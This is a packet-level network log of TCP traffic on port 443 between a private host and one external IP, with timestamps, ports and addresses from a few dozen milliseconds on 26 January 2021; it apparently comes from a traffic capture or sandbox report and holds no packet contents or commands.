Jan 26, 2021 21:25:20.633148909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.633189917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.633214951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.637449980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.637489080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.637547016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.637548923 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.637573004 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.637593031 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.637809038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.637851000 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.637883902 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.637900114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.637904882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.637950897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.637973070 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.637996912 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.638596058 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.638636112 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.638670921 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.638689995 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.658554077 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.658595085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.658622980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.658653021 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.658684015 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.658724070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.658750057 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.658838034 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.658889055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.660790920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.660832882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.660876989 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.660887957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.660895109 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.660936117 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.660953999 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.660989046 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661000967 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661036015 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661055088 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661082029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661103964 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661144972 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661267042 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661307096 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661340952 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661356926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661420107 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661463976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661488056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661514044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661541939 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661550999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.661577940 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.661614895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.662007093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.662049055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.662085056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.662101984 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.662116051 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.662154913 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.662169933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.662203074 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.662221909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.662240028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.662271976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.662309885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.663738966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.663783073 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.663813114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.663840055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.663851976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.663886070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.663918018 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.663937092 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.663940907 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.663983107 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.664015055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.664057970 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665592909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.665646076 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.665683031 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665705919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.665709972 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665746927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.665777922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665798903 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.665811062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665848970 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.665870905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665884972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.665916920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665937901 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.665971994 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666022062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666028023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666042089 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666075945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666105032 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666122913 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666126966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666167974 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666193962 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666218042 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666228056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666260958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666287899 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666327000 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666382074 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666423082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666454077 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666472912 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666476965 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666516066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666543961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666574001 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666575909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666615009 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666644096 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666663885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666666985 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666738033 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666793108 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666832924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666860104 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666886091 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666893959 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666945934 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.666971922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.666990995 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667015076 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667033911 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667045116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667083979 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667114019 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667140007 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667746067 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667788029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667821884 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667840958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667857885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667886972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667913914 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667929888 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.667941093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.667985916 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668010950 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668029070 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668045998 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668116093 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668432951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668709993 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668751955 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668786049 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668802977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668809891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668848991 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668875933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668901920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668901920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668948889 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.668975115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.668994904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669002056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669074059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669620037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669661999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669693947 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669715881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669732094 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669761896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669791937 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669804096 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669817924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669857979 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669886112 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669909000 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.669914961 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.669990063 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670552969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670593977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.670619965 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.670650005 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670653105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.670665979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670685053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.670707941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670721054 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.670734882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670753002 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.670774937 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670783043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.670787096 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.670841932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.671518087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.671550035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.671583891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.671587944 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.671612978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.671619892 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.671637058 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.671652079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.671680927 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.671685934 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.671699047 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.671716928 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.671744108 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672468901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.672502995 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672503948 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.672514915 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672538996 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.672543049 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672565937 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.672595978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672600031 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.672607899 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672631025 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.672657013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672667980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.672669888 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.672720909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673444033 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.673472881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.673506021 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.673506975 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673531055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673542023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.673551083 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673573017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.673599005 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673604965 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.673614025 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673635960 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673641920 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.673652887 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.673696041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.674386024 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.674413919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.674444914 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.674447060 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.674469948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.674480915 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.674490929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.674513102 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.674535990 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.674545050 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.674552917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.674597979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675201893 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.675230980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.675247908 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675266027 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.675266981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675276041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675281048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675298929 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.675327063 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675328016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.675350904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675360918 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.675371885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675390959 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.675421000 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.675436974 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.678772926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.679665089 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.679687977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.679743052 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688044071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688071966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688093901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688123941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688128948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688160896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688185930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688288927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688323975 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688349962 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688357115 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688369036 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688390017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688394070 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688416958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688445091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688448906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688463926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688481092 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.688487053 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.688534021 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.689373970 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.689416885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.689450979 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.689459085 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.689476967 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.689485073 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.689501047 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.689515114 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.689529896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.689548016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.689560890 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.689577103 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.689613104 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.689621925 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.690128088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.690164089 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.690193892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.690215111 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.690231085 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.690254927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.690279961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.690293074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.690299034 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.690332890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.690357924 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.690381050 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.690382957 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.690440893 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.691036940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.691071033 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.691103935 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.691118956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.691135883 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.691160917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.691185951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.691205025 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.691209078 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.691246033 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.691276073 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.691287041 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.691292048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.691350937 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.692049026 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.692082882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.692126036 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.692142963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.692159891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.692174911 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.692190886 CET	49165	443	192.168.2.22	172.67.150.228
